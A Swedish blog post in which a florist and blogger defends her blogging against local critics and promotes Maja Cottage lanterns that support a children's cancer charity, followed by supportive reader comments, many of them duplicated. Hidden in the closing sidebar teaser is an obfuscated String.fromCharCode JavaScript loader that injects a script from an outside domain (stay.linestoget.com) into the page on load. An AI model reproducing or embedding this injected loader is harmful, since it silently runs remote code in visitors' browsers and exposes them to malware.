Maja Cottage, Barn Cancerfonden, My’s Blommor, fuck cancer! -Tillsammans gör vi skillnad!

Slideshow-bild4

Hej Fina <3

Du vet väl om att jag inte ”bara” bloggar, tränar, reser, skriver och gör mode plåtningar? På sista tiden så har många ”lokalbor” kommenterat detta på Öland/Kalmar. På ett negativ sätt.

Jag FÖRSTÅR VERKLIGEN inte varför?!

Det är ett jobb! Ett jobb som jag älskar! Öland är fantastiskt, på många sätt…

Men det är GRYMT svårt att överleva som företagare vintertid, lågsäsongen blir FÖR låg.

Jag har kämpat i åtta snart nio år med att hålla öppet året runt, 7dagar i veckan! Det kallar jag service det!

Anledningen är att jag vill hålla min fantastiska personal med jobb året runt, jag tror på att ju fler lokala företagare som envisas med just det, ju starkare blir vi i längden.

Ju fler butiker, restauranger och handelsrörelser som håller öppet = fler besökare året runt!

Det ÄR viktigt för det lokala näringslivet!

För mig personligen hade det varit billigare att stänga vintertid och istället åka utomlands och titta på en blå himmel tillbakalutad i en solstol… 

-Men NEJ, jag har valt att kämpa emot! Men med handen på hjärtat kan jag säga att UTAN bloggen och allt vad den innebär, så skulle My’s blommor få stänga vintertid , helt och hållet!

My’s Blommor och jag är alltså beroene utav bloggen!

-Dom som klagar och ifrågasätter borde kanske tänka efter en gång innan man ifrågasätter , mitt sätt att resa, min blogg och alla ”ytliga” jobb och åtagande! Men det är väl den klassiska jantelagen som talar, 

-FUCK JANTELAGEN!

jag blir så trött på alla dessa inskränka, tragiska människorna som har förutfattade meningar, åsikter grundat på INGENTING! (Du ska INTE ta åt dig om du inte är en utav dom)

Var istället stolt, att jag som kommer från landet från början, med dyslexi och ett tungt Baggage, i bloggvärlden istället representerar just alla oss som inte alltid haft det så lätt, eller dom bästa förutsättningarna!

Att jag från ”ingenstans” kommit in bland Sveriges största bloggar, Stureplans profiler och modelejon och har lyckats kommi hit, behöver väl inte vara negativt?! 

Jag brukar sällan snäsa ifrån, men till dig som dömmer mig utan grunder:

-Var inte så förbannat negativ, döm mig inte för att jag sticker ut och står för min åsikt!!!

-stötta mig istället!!!! Jag har inte förändrats sedan Ensam Mamma Söker, jag har bara fler erfarenheter (på både gott och ont) Jag är fortfarande samma person som innan! En driven entreprenör med en jäkla vilja! 

Jag står med ena foten på röda mattan och i stockholm livet, jag står med andra foten i min älskade butik på landet med allt vad det innebär.

Men framförallt så står jag med BÅDA FÖTTERNA på jorden! 

Hmm, nog om detta och tillbaka till ämnet! 

Jag har alltså en handelsträdgård…  My’s Blommor på Öland. En stor väletablerad blomsterbutik med, trädgårds avdelning, snittavdelning, krukor, tillbehör och inredning. 

Denna butiken startade jag utan utbildning, kapital eller säkerhet som driven 18-åring! Med skakiga ben fyllde jag i en ansökan om f-skatt sedel. Jag hade bott själv sedan 13-14 års ålder och precis gått igenom ”livets härda skola” men jag visste vad jag ville och hade stora ambitioner och ett förbannat driv i mig själv…..

nu åtta är senare så kan jag kan stolt påminna er om att vi är återförsäljare för Maja Cottage. Maja Cottage skänker pengar varje månad till Barn Cancerfonden

”Tillsammans gör vi skillnad”

Det är så sant som det står skrivet på översta bilden som kommer ifrån Maja Cottages hemsida…

Man kan tycka att 10% låter lite när det står att det skänks till barncancerfonden. MEN DET GÖR SKILLNAD!  Här nedan kan du se vad Maja Cottage hade för mål 2014.

2014resultat

Resultatet? -GALET BRA!

 Kollektionen, lyktorna, tavlorna, sprider inte bara ljus och värme med sina tända ljus.

Det är kärleksord, hälsningar, citat. Citat som ger hopp, för den som behöver.

Att ge bort en lykta ifrån Maja Cottage känns på något sätt extra bra, när man vet att en del utav pengarna går till just barncancerfonden. Vi på My’s Blommor högaktar och respekterar människorna bakom Maja Cottage högt! Vi är stolta över att få vara återförsäljare och en del utav att ”Tillsammans göra skillnad” 

802-27-linaroos-045758-27-linaroos-132782-27-linaroos-162

Här ser ni en del utav vad vi har hemma i sortimentet just nu. Fler lyktor är beställda och på ingång =) Vill du också göra skillnad? Du kan komma förbi butiken, där vi har välsorterade ”Maja Cottage hyllor” eller så kan du  om du bor på annan ort gå in på deras webbshop HÄR

Slideshow-bild1

Kramar / My Martens

Ps: Sprid detta vidare!!!! DELA INLÄGGET  <3 Tillsammans gör vi verkligen skillnad!!! #fuckcancer

Ps till alla er lokalbor som inte är negativa, utan som stöttar och finns där för mig så ska ni veta att ni verkligen betyder oerhört mycket! Från hjärtat! Utan er så skulle inte My’s Blommor  eller jag vara någonting!

19 Komentarer

 1. Alltså det är så förbannat jävla störigt att folk ska lägga sig i så mycket, ha åsikter och tycka en jädrans massa. Om du bloggar eller inte, skiiiiit i det. Det är ju ditt liv, orka lägga sig i, skaffa er ett liv själva och klagar på era egna rövar. Förbaskat irriterande.
  Kör på My, du är fan underbar. <3

 2. Fan My, jantelagen i Sverige är bedrövlig!! Jag är också småföretagare på landet och vet precis hur mycket arbete, ångest och sömnlösa nätter det innebär och varje krona man kan få in för att kunna betala personal och omkostnader är guld värd, ens egna lön är inget att skryta med och kan man, som du, få intäkter och synas på fler håll är det bara att köra på!! Jag bor ”en bro ifrån dig” och besöker din butik då och då, senast härom veckan, och måste säga att du är fantastiskt duktig och butiken är så inspirerande! Hade jag sett dig (som jag ”känner” via bloggen ? ) så hade du fått en stor kram, men du får den här och hoppas du även vidarebefordrar den till din fina personal!!

 3. Alltså det är så förbannat jävla störigt att folk ska lägga sig i så mycket, ha åsikter och tycka en jädrans massa. Om du bloggar eller inte, skiiiiit i det. Det är ju ditt liv, orka lägga sig i, skaffa er ett liv själva och klagar på era egna rövar. Förbaskat irriterande.

  Kör på My, du är fan underbar. <3

 4. Att folk orkar! Dels tycker jag det är kul att läsa sen är det en resa du har gjort som är grym!
  På tal ngt annat….igår var jag hos Tuve på konsultation, så spännande! Har två kliniker att välja mellan. Citadell och ArtClinic i Mölndal. AC är hemmavid men känslan var lite mer på Citadellkliniken.
  Ha en trevlig helg

 5. Fan My, jantelagen i Sverige är bedrövlig!! Jag är också småföretagare på landet och vet precis hur mycket arbete, ångest och sömnlösa nätter det innebär och varje krona man kan få in för att kunna betala personal och omkostnader är guld värd, ens egna lön är inget att skryta med och kan man, som du, få intäkter och synas på fler håll är det bara att köra på!! Jag bor ”en bro ifrån dig” och besöker din butik då och då, senast härom veckan, och måste säga att du är fantastiskt duktig och butiken är så inspirerande! Hade jag sett dig (som jag ”känner” via bloggen 😉 ) så hade du fått en stor kram, men du får den här och hoppas du även vidarebefordrar den till din fina personal!!

 6. Att folk orkar! Dels tycker jag det är kul att läsa sen är det en resa du har gjort som är grym!
  På tal ngt annat….igår var jag hos Tuve på konsultation, så spännande! Har två kliniker att välja mellan. Citadell och ArtClinic i Mölndal. AC är hemmavid men känslan var lite mer på Citadellkliniken.
  Ha en trevlig helg

 7. Hej dig My! Har själv inte varit i bloggvärlden så mycket längre än ett år nu precis, och jag har fått så otroligt många nya erfarenheter och verkligen lärt mig MASSOR om vad blogglivet verkligen innebär under det senaste året! När själva nyförälskelsen kring allt som har med bloggandet att göra har lagt sig lite så börjar man på djupet att inse vad det faktiskt innebär och att allting har en baksida! Tror att de elaka tungorna mestadels bottnar i okunskap och avundsjuka! Riktigt trist att det måste vara så! Upplever själv samma sak till viss del. Många förstår inte att bloggandet verkligen är ett jobb och att allt det man driver kring bloggen är ett litet företag i sig! JA FUCK JANTELAGEN VERKLIGEN! Well written! Kram & kärlek <3 /Susanne

 8. Sssss,alltså suck så både lokala och icke lokala förmågor måste försöka dra ner andra för att känna sig lite bättre själv. Man hör ju på långa vägar hur missunnsamheten sprutar ur örona på dem. Låt dem inte komma åt dig! Det kommer alltid att finnas de där som antingen känner av konkurrens eller som känner frustration och maktlöshet när andra visar framfötterna och tar sig fram. Det är tydligen jätteprovocerande för många som skulle vilja leva så själv. Däremot ids de inte tänka på hur mycket arbete som ligger bakom allt. Människor är mycket mer välvilligt inställda till dem som bara lägger sig ner och är offer, för då kan man känna sig liiite bättre och vara liiite nöjdare med sitt eget liv även om det annars är miserabelt i kubik.
  Oj, detta blir långt, men ville bara säga: Skit i dem My! Du är så himla inspirerande och cool! Det är upplyftande att läsa din blogg som är varvad med vardag, vackra bilder, all kärlek till din Lilleman, vänner och vovven och så lite glamour och kändisliv därtill! ? Precis som en blogg ska vara! Du ska inte be andra om ursäkt för ditt arbete och dina inkomstkällor! Du är mångsidig och bra på en massa. Fortsätt framåt, vi är många som hejjar på dig! ? Kram!

 9. Hej dig My! Har själv inte varit i bloggvärlden så mycket längre än ett år nu precis, och jag har fått så otroligt många nya erfarenheter och verkligen lärt mig MASSOR om vad blogglivet verkligen innebär under det senaste året! När själva nyförälskelsen kring allt som har med bloggandet att göra har lagt sig lite så börjar man på djupet att inse vad det faktiskt innebär och att allting har en baksida! Tror att de elaka tungorna mestadels bottnar i okunskap och avundsjuka! Riktigt trist att det måste vara så! Upplever själv samma sak till viss del. Många förstår inte att bloggandet verkligen är ett jobb och att allt det man driver kring bloggen är ett litet företag i sig! JA FUCK JANTELAGEN VERKLIGEN! Well written! Kram & kärlek <3 /Susanne

 10. Sssss,alltså suck så både lokala och icke lokala förmågor måste försöka dra ner andra för att känna sig lite bättre själv. Man hör ju på långa vägar hur missunnsamheten sprutar ur örona på dem. Låt dem inte komma åt dig! Det kommer alltid att finnas de där som antingen känner av konkurrens eller som känner frustration och maktlöshet när andra visar framfötterna och tar sig fram. Det är tydligen jätteprovocerande för många som skulle vilja leva så själv. Däremot ids de inte tänka på hur mycket arbete som ligger bakom allt. Människor är mycket mer välvilligt inställda till dem som bara lägger sig ner och är offer, för då kan man känna sig liiite bättre och vara liiite nöjdare med sitt eget liv även om det annars är miserabelt i kubik.
  Oj, detta blir långt, men ville bara säga: Skit i dem My! Du är så himla inspirerande och cool! Det är upplyftande att läsa din blogg som är varvad med vardag, vackra bilder, all kärlek till din Lilleman, vänner och vovven och så lite glamour och kändisliv därtill! 🙂 Precis som en blogg ska vara! Du ska inte be andra om ursäkt för ditt arbete och dina inkomstkällor! Du är mångsidig och bra på en massa. Fortsätt framåt, vi är många som hejjar på dig! 🙂 Kram!

 11. Hej My!
  Har aldrig svarat el.skrivit på din blogg förut, men tittar in nästan varje kväll.Njuter av allt du har och lyckats åstadkomma. Har ägt en butik i en liten stad inte så långt från dig och vet precis vad du få utstå. Tycker du är fantastiskt duktig och försök att strunta i alla avundsjuka människor runt omkring dig. Försök att njuta av dina verksamheter och din lilla goa kille.
  Fortsätt lycka.
  Mvh Eva

 12. Hej My!
  Har aldrig svarat el.skrivit på din blogg förut, men tittar in nästan varje kväll.Njuter av allt du har och lyckats åstadkomma. Har ägt en butik i en liten stad inte så långt från dig och vet precis vad du få utstå. Tycker du är fantastiskt duktig och försök att strunta i alla avundsjuka människor runt omkring dig. Försök att njuta av dina verksamheter och din lilla goa kille.
  Fortsätt lycka.
  Mvh Eva

 13. Tycker att du är en förebild. Här har detaljhandeln stängt på söndagar det betyder att jag i stort sätt bara shoppar på nätet, jag är bara i stans olika affärer max en gång i månaden… För söndagar är dagen då jag har tid att handla…. Och allt är stängt… Bor i en liten stad som är beroende av sin lokalbefolkning.. Så vill de sälja får de nog skaffa bättre öppettider… Utöver det älskar jag din blogg. Kämpa på, folk är bara avundsjuka!

 14. Tycker att du är en förebild. Här har detaljhandeln stängt på söndagar det betyder att jag i stort sätt bara shoppar på nätet, jag är bara i stans olika affärer max en gång i månaden… För söndagar är dagen då jag har tid att handla…. Och allt är stängt… Bor i en liten stad som är beroende av sin lokalbefolkning.. Så vill de sälja får de nog skaffa bättre öppettider… Utöver det älskar jag din blogg. Kämpa på, folk är bara avundsjuka!

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/